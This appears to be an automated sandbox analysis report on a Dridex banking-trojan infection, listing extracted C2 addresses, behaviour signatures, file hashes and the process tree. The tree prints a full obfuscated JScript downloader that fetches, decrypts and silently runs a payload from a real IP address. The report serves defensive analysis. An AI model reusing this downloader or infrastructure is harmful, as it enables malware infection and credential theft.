Analysis

  • max time kernel: 135s
  • max time network: 152s
  • platform: windows10_x64
  • resource: win10-en
  • submitted: 10-09-2021 00:52

General

  • Target: https://ankltrafficexit.xyz/trafficexit
  • Sample: 210910-a7538ahad4

Malware Config

Extracted

  • Family: dridex
  • Botnet: 10111
  • C2:
    104.152.111.198:9676
    92.247.29.75:10172
    133.242.136.130:8194
  • rc4.plain

Signatures

  • Dridex

    Dridex (known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3808
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3808 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hX1ZytEytd" "http://31.44.3.102/?NDc2NTc3&FwZgo&dsfdffg43t=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7LPRAOzrlyCelTVo_AsJONUPQDn2UaIfgdpydxdAFsR8_2piUDQzUKU05bT9UaIUQlG-aLIVLA46A&cxssdvxcv=110mpinny.93an92.406p2g8u8&sdfsdfdfg=twix&ogfgafgn4=w3_QMvXcJx7QFYPJKfrcT&fhfghddfsdf=diet&qWOMaFdXKMjE0Mjg=" "2"
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3092
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c mgbzb.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2728
            • C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
              mgbzb.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4080

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion: Modify Registry (1) T1112
  • Discovery: Query Registry (1) T1012
  • Discovery: System Information Discovery (2) T1082

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\AX9VL96L.cookie
    MD5: 1f403453c8c06f592ef85359cf8ea515
    SHA1: 149510271bb735493648f48063b1f4b41e82c6b0
    SHA256: f5d9f42581ec5d3e2ebe4b11d7e378df3531b24c6a7391bcbdf3504ecc882ba3
    SHA512: cc26499c5c36f793967d4f9bca2253e638a5c384f28cbfcd5b3881a8a8007c8971452c6159f890aa33191b8d8ca217cc75dca892029ad92985308c23dc9a51d1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\KH5DLZTJ.cookie
    MD5: 67fb146c5b5deec4419b893b40508d85
    SHA1: 5915e27de1f97f5e77339ce61ddd401e5a847840
    SHA256: 323e48286be512fd8b4d492e2012170a7904488469610de19d1ecdbbd9ea09e6
    SHA512: 5712417ffc5f0de6474480d488b665196a3e098f09f661a36360b736a934ecc106c1f4fb73ff21b40b882a9a7536d99c9c0db8adcbca9de54b58299af6238536

  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5: 60fc00422b399db85f87d41b8328976d
    SHA1: bb85034acad8025f97e5bb236443debaf8926e4b
    SHA256: c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
    SHA512: 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

  • C:\Users\Admin\AppData\Local\Temp\mgbzb.exe
    MD5: 223dc24b1075564c200030321e21ee09
    SHA1: 76fdfb19ae4f9de19f5c039c16fd519a5f96027f
    SHA256: 9ba5eb35f3869aaba5be3c0dc7bc64ff2de408c3679c13f0b84733da0a78a280
    SHA512: 29f073141709ff88d050282ebffd1d6ad9278068ff78e37537b26e88063664f7d6652abcd15666e3d53d8ef2ef9fb75b59eae0febc1f760a5e73aae3e71c9277

  • memory/1384-116-0x0000000000000000-mapping.dmp
  • memory/2728-120-0x0000000000000000-mapping.dmp
  • memory/2996-117-0x0000000000000000-mapping.dmp
  • memory/3092-118-0x0000000000000000-mapping.dmp
  • memory/3808-115-0x00007FFCAE9E0000-0x00007FFCAEA4B000-memory.dmp (Filesize: 428KB)
  • memory/4080-121-0x0000000000000000-mapping.dmp
  • memory/4080-125-0x0000000000400000-0x000000000051A000-memory.dmp (Filesize: 1.1MB)
  • memory/4080-124-0x00000000005B0000-0x00000000006FA000-memory.dmp (Filesize: 1.3MB)